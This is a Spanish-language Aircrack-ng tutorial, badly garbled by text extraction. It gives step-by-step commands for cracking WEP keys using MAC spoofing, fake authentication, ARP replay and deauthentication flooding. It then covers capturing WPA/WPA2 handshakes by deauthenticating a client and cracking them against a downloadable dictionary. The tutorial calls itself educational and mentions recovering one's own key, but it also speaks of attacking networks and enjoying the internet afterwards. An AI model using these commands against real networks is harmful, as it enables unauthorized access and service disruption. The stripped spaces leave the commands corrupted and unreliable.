TUTORIALDEAIRCRACKNG

Paolo NorambuenaEstudiante Ingeniera (e)

en Computacin e InformticaUniversidad del Bo-Bo, Concepcin.

TutorialdeAircrackngbyPaoloNorambuenaislicensedunderaCreative

CommonsAtribucinNoComercialLicenciarIgual2.0ChileLicense.

TutorialdeAircrackngbyPaoloNorambuenaislicensedunderaCreative

CommonsAtribucinNoComercialLicenciarIgual2.0ChileLicense.

AIRCRACKNGEstaesunaguaconfineseducativosparaelusoymanipulacindeAircrackng

sobre las distintas distribuciones deLinux. Seexplicar desdesu instalacinen

sistemas como Mandriva, Ubuntu, Debian, OpenSuse y SlackWare para que

posteriormentenoexistandudassobreningunadistribucin.

En primer lugar debemos tener instalado en nuestro sistema el Driver del

Fabricante de nuestra tarjeta de red, aircrackng no funciona con drivers

emuladosporndiswrapper.

InstalandoAircrackng

En este apartado instalaremos aircrackng en las distintas distribuciones

comenzandoporUbuntu.

Ubuntu.

$sudoaptgetinstallaircrackng

Mandriva

#urpmiaircrackng

OpenSUSE

Descargar:

ftp://ftp.pbone.net/mirror/packman.iubremen.de/suse/11.0/SRPMS/aircrackng1.0rc3

0.pm.1.nosrc.rpm

InstalarhaciendoDobleClickalpaqueteunavezdescargado.

SlackWare

Descargar

http://repository.slacky.eu/slackware12.2/security/aircrackng/1.0rc3/aircrackng

1.0rc3i4861dd.tgz

Unavezdescargadoporconsola(terminalkonsole,etc),ejecutar

#installpkgaircrackng1.0rc3i4861dd.tgz

Paquetescomplementarios.

Unavezinstaladoaircrackngpuedesernecesariolainstalacindeunpaquete

adicional por lo cual descargaremos IW, quees uncomplementoparaponer

nuestratarjetainalmbricaenmodomonitor.

segnladistribucinsernecesarioactualizarlalibreralibnl

$sudoaptgetinstalllibnl1*(ubuntu,debian)

#urpmialibnl(mandriva)

Instaladay/oactualizadalalibreraprocedemosadescargariw.

#wgethttp://wireless.kernel.org/download/iw/iw0.9.13.tar.bz2

#tarjxvfiw0.9.13.tar.bz2

#cdiw0.9.13

#make

#makeinstall

Ydeestaformayatenemosaircrackngysucomponenteparaponerenmodo

monitornuestrawireless.

Ahorasolonosquedaempezaratrabajar.

RecuperandoClaves.

Ahoraempezamosnuestrotrabajo,loqueserealizanteriormentesolosehace

unavez,queesparainstalaryconfigurardebuenaformanuestrasuite,loquese

realizasiempreesloqueacontinuacinsedetalla.

Paraquienescreenquecambiarsumacesnecesario,puedenhacerloasi

Mandriva:

#ifconfig(wlan0,eth1,etc)down

#ifconfig(wlan0,eth1,etc)hwether00:11:22:33:44:55

#ifconfig(wlan0,eth1,etc)up

Debian/Ubuntu:

$sudoifconfig(wlan0,eth1,etc)down

$sudoifconfig(wlan0,eth1,etc)hwether00:11:22:33:44:55

$sudoifconfig(wlan0,eth1,etc)up

Slackware:

#ifconfig(wlan0,eth1,etc)down

#ifconfig(wlan0,eth1,etc)hwether00:11:22:33:44:55

#/etc/rc.d/rc.inet1(wlan0,eth1,etc)start

IMPORTANTE:LasdireccionesmacSIEMPREdebeniniciarcon00

ParasabercualesnuestraMACdebemosejecutar

#ifconfig(wlan0,eth1,etc)|grepHwaddr

De lavistaanterior podemossacarnuestradireccinmacde HWaddr la serie

numericaqueacompaa la instruccinantesdestacadaesnuestradireccin,

queutilizaremosdesdeahoraenadelante.

Airmonng.

Airmonng es parte de la suite de aircrackng la cual permite crear la

interfazmon0enmodomonitor.Suutilizacineslasiguiente

#airmonngstart(wlan0,eth1,etc)

En caso de que nos muestre un error podemos utilizar iw que instalamos

anteriormente.

#iwdevwlan0interfaceaddmon0typemonitor

Yconestoyatenemoselprimerpasocompleto.

Airodumpng

#airodumpngmon0

Deestaformaveremostodaslasredesdisponiblesconsusrespectivoscanales,

una vez que ya encontramos nuestra red creamos un filtro con el canal de

trabajo,enestecasocanal6(columnaCH),paramoslaejecucindeairodump

ngpresionandoCtrl+C,yposteriormenteejecutamos:

c=Filtrodecanal6,11,1,etc.

w=Escribirresultadosenundocumento.

#airodumpngc6wnombremon0

Deestaformahemoscreadounfiltroquesolotrabajarenelcanalindicado(6).

NuestraredesJimmy

AireplayNg

Unavezqueairodumpngyaesttrabajando,abrimosunanuevaconsoladonde

empezaremosatrabajarconaireplayng.

Loprimeroquedebemoshacerconaireplayngesasociarnosalared.

#aireplayng16000q10o1e(ESSIDRouter)a(MacRouter)h(nuestramac)

mon0

Donde:

16000=Autentificarcada6000segundos.

q10=IntervalodetiempoenqueenviarunpaqueteKeepAlive

o1=Cantidaddepaqueteskeepallivequeenviar

Creoquemuchossepuedenpreguntar,dedondeobtengoelESSIDylaMacdel

Router?.Bueno,sirecordamosenlaconsolaanteriorejecutamosairodumpng,de

esapantallaencontramoslascolumnasBSSIDyESSIDquecorrespondenalamac

ylaESSIDonombredelrouterrespectivamente.

Deestaformaestaremosasociadosalaredlacualcada10segundosaireplayng

mandarunpaquetellamadoKEEPALIVE,loqueavisaralrouterqueseguimos

asociadosyasinonosbotaracadarato.

Yaasociadosprocedemosaenviarycapturarpaquetes,paraesoenunanueva

consolaejecutaremosnuevamenteaireplayngperoenmodoagresivo.

#aireplayng3b(Macdelrouter)h(nuestramac)mon0

DelaimagenanteriorloquenosinteresaesqueaumentenlosARP,yaqueson

esoslospaquetescapturadosylosqueademsnosentregarnlaclavebuscada.

Unavezquetenemosdesde150.000paquetescapturadosempezamosatrabajar

conaircrackng.

Nuncaestdemsrecordarquemientrasmaspaquetescapturados,esmucho

mejor,yaquemsprontoobtendremoslaclave.

EncasodequeesteataquenocapturepaquetesARPoqueenmuchotiempo

hayamos capturado pocos paquetes, podemos realizar un Ataque DoS

(DenegacindeServicios).Pararealizaresteataqueesnecesariosimplemente

saberladireccinMacdelRouter,datoqueporlodems,hemosutilizadopara

cadaaccinconaircrackngysuscomponentes.

AhoraComorealizamoselataqueDoSconaircrackng?

R://#aireplayng00a(MacRouter)mon0

Conesoyaestaramosacelerandolatransferenciaycapturadepaquetes.

AircrackNg

Ya estamos en el paso final, con los paquetes de datos capturados

procedemosaejecutaraircrackng,paralocualtenemosdosformas,unalenta

peroefectiva,yunarpidaperosenecesitaunamayorcantidaddepaquetes

paradesencriptarlaclave.

Formalenta

#aircrackng*.cap

FormaRpida(senecesitamayorcantidaddepaquetescapturados)

#aircrackngz*.cap

De esta forma ya hemos desencriptado la clave que buscabamos, solo nos

quedahacerconfigurarlaclaveenelclientedeconexinparaesosolotienen

queborrarlosdospuntos(:)quehayentrecadapardecaracteres,ahoraa

disfrutardeinternet.

Recordatorio.

Alfinalizarestetutorial,caberecordarqueladistanciaafectanuestrotrabajo,

siestamosmuylejosdelaredaatacarlatransferenciaycapturadepaquetes

sermuylentallegandoinclusoasernula.Porlocualesrecomendableestara

unadistanciaprudenteparapoderrealizarlacapturadeformarpida.

Losdriversparalastarjetasinalambricasdebenserlospropietarios,nosepuede

realizarporemulacindedrivers,enestecasoconndiswrapper,porejemplo.

LasaccionesdebenserejecutadascomoSuperUsuario(root)enlossistemas

quelopermitan,encasodeUbuntu,sedebeejecutarconsudo.

Las direcciones mac SIEMPRE deben iniciar con 00 en caso de que las

cambienenformamanual.

Sinoaireplayngnoinyectanicapturapaquetes,realizamosunataqueDoS

conaireplay#aireplayng00a(MacRouter)mon0

Todoloquetenga#enUbuntusedebeejecutarconsudo.

Finalizando.

Esperoqueestetutorialseadeutilidadparacadapersonaquelolea.Estetutorial

est enfocadoenuna formadeataque, enaircrackngexistenmuchos otros

mtodos,algunosmscomplicadosqueotros,perolaideaesaprenderyadoptar

laformamscmodaparacadauno.

AgradecimientosAnbalChavoZapata,porlainstruccindeataqueDoS.

Informacin recopilada de distintos sitios de internet, especialmente de

http://www.aircrackng.org/doku.phpsitiooficialdeAircrackng.

Encasodeduda,contactarawjotta@gmail.com

TutorialdeAircrackngbyPaoloNorambuenaislicensedunderaCreative

CommonsAtribucinNoComercialLicenciarIgual2.0ChileLicense.

Parte2:

Recuperando

Claves

WPA/WPA2Con

Aircrackng

Introduccin.

De seguro muchos se han preguntado, como poder recuperar la clave

wpa/wpa2demiroutersintenerqueresetearlo?,buenoal igualqueantes, la

respuestaesconaircrackng.

Enestaseccinsedemostrarcomoenunospocospasossepuedeobtenerla

claveenformarpida,losingredientespararecuperarestasclavesson:

Equipocontarjetainalambrica.

DistrodeLinuxInstaladaoLiveCD.

SuiteAircrackNGinstalada(sedetalloenlaprimeraparte).

Diccionariodepalabras.

SaberladireccinMACdenuestratarjeta(sevioenlaseccinanterior)

airmonng

Comenzandoconestapartedebemosponernuestratarjetaenmodomonitor

#airmonngstart(wlan0,eth1,etc)

En caso de que nos muestre un error podemos utilizar iw que instalamos

anteriormente.

#iwdevwlan0interfaceaddmon0typemonitor

Yconestoyatenemoselprimerpasocompleto.

Airodumpng

#airodumpngc(numerodecanal)w(nombrearchivo)mon0

Asestamosescaneandolasredesexistentesenunsolocanal,estaconsoladebe

seguirtrabajandosinserdetenida.

Deestapantallanecesitaremoslossiguientesdatosconloscualestrabajaremosel

restodeltutorial.

NombredelRouter(ESSID):wifiubb

MacdelRouter(BSSID):00:1A:70:EE:5E:D6

DireccinMACdeuncliente:00:16:44:A2:40:D4

Aireplayng

Yatenemoslosdatosnecesariosyairodumpngsigueenfuncionamiento,porlo

cualahoraeselturnodeaireplayng.

Enunanuevaconsolaejecutamos:

#aireplayng01a00:1A:70:EE:5E:D6c00:16:44:A2:40:D4mon0

dondetenemos

0:deautenticacin

1 : es el nmerodedeautenticaciones enviadas (puedesenviar infinitas si se

deseas.Parainfinitoes0)

a:esladireccinMACdelpuntodeaccesooRouter

c:esladireccinMACdelclientequequeremosdeautenticar

De esta forma estamos capturando el handshake que necesitamos paradesencriptarlaclave.

Una vez que se ha captura el handshake ejecutamos aircrackng para sudesencriptacin.

Paraaircracklasinstruccionessonlassiguientes

#aircrackngwdiccionariob00:1A:70:EE:5E:D6*.cap

Yposteriormente,obtendremosnuestraclaveconunasalidacomoesta

Recomendaciones.

ParatrabajarconclavestipoWPA/WPA2esnecesariopodercontarconunbuendiccionariodepalabras,yaqueeltrabajodeaircracknges ircomparandoelhandshakeconcadaunadelaspalabrasdeldiccionarioquetenemos.

Puedendescargarundiccionariodepalabrasdesdeaqu

http://wjota.uuuq.com/tutoriales/diccionario.zip

Queesel diccionarioqueseutiliz parael ejemplo, ypuedeser modificado,agregandooquitandopalabras.

TutorialdeAircrackngbyPaoloNorambuenaislicensedunderaCreative

CommonsAtribucinNoComercialLicenciarIgual2.0ChileLicense.